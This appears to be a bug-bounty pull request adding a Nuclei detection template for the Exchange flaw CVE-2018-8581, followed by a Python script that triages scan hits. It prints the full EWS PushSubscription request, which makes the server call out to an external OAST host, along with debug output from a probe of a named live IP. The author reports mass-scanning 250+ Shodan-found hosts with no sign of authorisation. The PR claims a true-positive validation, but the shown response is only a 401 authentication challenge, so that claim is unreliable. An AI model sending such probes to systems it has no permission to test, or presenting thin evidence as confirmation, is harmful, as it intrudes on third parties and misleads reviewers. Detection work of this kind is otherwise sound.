Description
PR Information
This PR adds a Nuclei template for CVE-2018-8581, which is a high-severity elevation of privilege vulnerability in Microsoft Exchange Server. The template performs an active probe of the EWS PushSubscription endpoint to verify the vulnerability through an OAST (Interactsh) interaction.
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
https://vulncheck.com/xdb/276c34c7f74f
Template validation
[x] Validated with a host running a vulnerable version and/or configuration (True Positive)
[ ] Validated with a host running a patched version and/or configuration (avoid False Positive)
Additional Details
The template has been mass-validated against 250+ live Exchange instances found via Shodan. The template correctly identifies the /ews/exchange.asmx endpoint and triggers the expected NTLM authentication challenge.
Shodan Query: cpe:"cpe:2.3:a:microsoft:exchange_server"
Nuclei Debug Output (Validated on 92.117.167.184):
nuclei -t cve-2018-8581.yaml -u https://92.117.167.184 -debug -o debug_log.txt
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.4
projectdiscovery.io
[INF] Current nuclei version: v3.4.4 (outdated)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 176
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[INF] [CVE-2018-8581] Dumped HTTP request for https://92.117.167.184/ews/exchange.asmx
POST /ews/exchange.asmx HTTP/1.1
Host: 92.117.167.184
User-Agent: Nuclei - Open Source Project (https://github.com/projectdiscovery/nuclei)
Content-Length: 685
Accept: text/xml
Accept-Language: en
Connection: close
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:t="http://schemas.microsoft.com/exchange/services/2004/types"
xmlns:m="http://schemas.microsoft.com/exchange/services/2004/messages">
<soap:Header>
<t:RequestServerVersion Version="Exchange2010" />
</soap:Header>
<soap:Body>
<m:Subscribe>
<m:PushSubscriptionRequest SubscribeToAllFolders="true">
<t:URL>http://d5fng43q7lacfghsa2603mg9xozw7ckx5.oast.fun</t:URL>
<t:StatusFrequency>1</t:StatusFrequency>
</m:PushSubscriptionRequest>
</m:Subscribe>
</soap:Body>
</soap:Envelope>
[DBG] [CVE-2018-8581] Dumped HTTP response https://92.117.167.184/ews/exchange.asmx
HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 0
Date: Thu, 08 Jan 2026 09:25:39 GMT
Request-Id: c72932dd-27e2-48d3-b4cd-648b63e6b978
Server: Microsoft-IIS/10.0
Www-Authenticate: Negotiate
Www-Authenticate: NTLM
X-Feserver: SRV03
X-Owa-Version: 15.2.1748.39
X-Powered-By: ASP.NET
[CVE-2018-8581:word-3] [http] [high] https://92.117.167.184/ews/exchange.asmx
[INF] Scan completed in 7.991135636s. 1 matches found.
hacker@hacker ~/Desktop/CVE %
Bounty Claim: /claim #14576 /attempt #14576
Mahmadisha Shaikh
@BotGJ16
ProjectDiscovery
@projectdiscovery
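
A triage check for hits like the one in the debug output above, written as an added example (it is not part of this PR, the template, or nuclei). It treats a hit as confirmed only when the OAST callback the description refers to was actually recorded; the function names, verdict labels and the sample response are constructed for illustration, and the `SubscribeResponse` body check is an assumption about how an accepted request is recognised.

```python
# Added example: triage of a template hit on /ews/exchange.asmx.
# SAMPLE_401 is a constructed response used only for illustration.
SAMPLE_401 = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Content-Length: 0\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Www-Authenticate: Negotiate\r\n"
    "Www-Authenticate: NTLM\r\n"
    "X-Owa-Version: 15.2.1748.39\r\n"
    "\r\n"
)

def parse_response(raw):
    """Return (status, headers, body); headers maps lower-cased name -> list of values."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # repeated headers (two Www-Authenticate lines) are all kept
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body

def triage(raw_response, oast_callback_seen):
    """Classify the evidence behind a hit; only a recorded callback confirms it."""
    status, headers, body = parse_response(raw_response)
    schemes = {v.split()[0].lower() for v in headers.get("www-authenticate", []) if v}
    build = (headers.get("x-owa-version") or [None])[0]
    if oast_callback_seen:
        verdict = "confirmed"               # server connected out to the subscription URL
    elif status == 401 and schemes & {"ntlm", "negotiate"}:
        verdict = "auth-challenge-only"     # EWS asked for credentials; request rejected
    elif status == 200 and "SubscribeResponse" in body:
        verdict = "subscribed-no-callback"  # accepted, but no outbound request observed
    else:
        verdict = "inconclusive"
    return {"verdict": verdict, "status": status,
            "schemes": sorted(schemes), "build": build}

if __name__ == "__main__":
    print(triage(SAMPLE_401, oast_callback_seen=False))
```
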